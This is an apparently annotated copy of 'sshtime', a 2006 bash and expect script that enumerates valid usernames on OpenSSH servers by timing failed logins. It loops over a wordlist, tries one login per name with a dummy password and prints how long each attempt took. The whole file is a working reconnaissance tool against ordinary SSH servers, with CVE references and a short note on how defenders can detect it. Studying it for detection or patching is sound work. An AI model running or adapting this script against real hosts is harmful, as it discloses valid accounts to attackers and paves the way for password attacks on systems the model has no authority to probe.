sshtime v0.1 is a simple OpenSSH timing-attack tool, based on expect, meant to remotely analyze timing differences in sshd "Permission denied" replies. Depending on OpenSSH version and configuration, it may lead to disclosure of valid usernames.
b57569d93458fb3032f8c9681c5bf741fcd8ec30007b182512af76f3c1f46e56
#!/bin/bash
#
# $Id: sshtime,v 1.3 2006/10/11 15:32:31 raptor Exp $
#
# sshtime v0.1 - Simple OpenSSH remote timing attack tool
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# SSHtime is a shell script based on expect meant to remotely analyze timing
# differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# See also:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#
# Some vars
# Target port is hard-coded; the script takes no port argument.
port="22"
# Command line: <target> <wordlist> (validated further down; no defaults)
host="${1}"
dict="${2}"
# Local functions
function head() {
  # Print the banner (blank line, two text lines, blank line) to stdout.
  # NOTE: this function shadows the coreutils `head` command for the rest
  # of the script; every later bare `head` call refers to this banner.
  printf '\n%s\n%s\n\n' \
    "sshtime v0.1 - Simple OpenSSH remote timing attack tool" \
    "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
}
function foot() {
  # Emit a trailing blank line and terminate the whole script with status 0.
  # Called from usage() and notfound() as well, so those paths also exit 0.
  printf '\n'
  exit 0
}
function usage() {
  # Banner, host-key reminder, usage text; then foot() ends the script (exit 0).
  head
  printf '%s\n\n%s\n%s\n' \
    "[make sure the target hostkey has been approved before]" \
    "usage : ./sshtime <target> <wordlist>" \
    "example: ./sshtime 192.168.0.1 dict.txt"
  foot
}
function notfound() {
  # Banner plus the "expect missing" message; note the message goes to
  # stdout (not stderr) and foot() exits 0, so a caller cannot distinguish
  # this failure from a normal run by exit status.
  head
  printf '%s\n' "error : expect interpreter not found!"
  foot
}
# Check if expect is there
# The assignment's status is the status of `which`; non-zero means no
# interpreter was found and notfound() ends the script.
if ! expect=$(which expect 2>/dev/null); then
  notfound
fi
# Input control
# Only the second argument (wordlist) is checked; usage() exits the script.
[[ -z "$2" ]] && usage
# Perform the bruteforce attack
# NOTE: `head` here is the banner function defined above, not coreutils head.
head
# One ssh session per wordlist entry. The wordlist is expanded unquoted, so
# entries are split on IFS and subject to globbing exactly as written.
for user in `cat $dict`
do
echo -ne "$user@$host\t\t"
# Wraps a single ssh login attempt in `time -p`: expect answers the password
# prompt with "dummy" and waits for EOF, then only the "real" (wall-clock)
# line of the timing output is kept, so each output line is the elapsed time
# of one (presumably failed) authentication for that username.
# Defender's note: each iteration typically shows up in the target's sshd
# auth log as a failed-password event, so a run looks like a sweep of one
# failure per username from a single source address — a straightforward
# detection signal. The behaviour relied on is the one tracked by the
# CVE-2003-0190 / CVE-2006-5229 references in the file header.
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot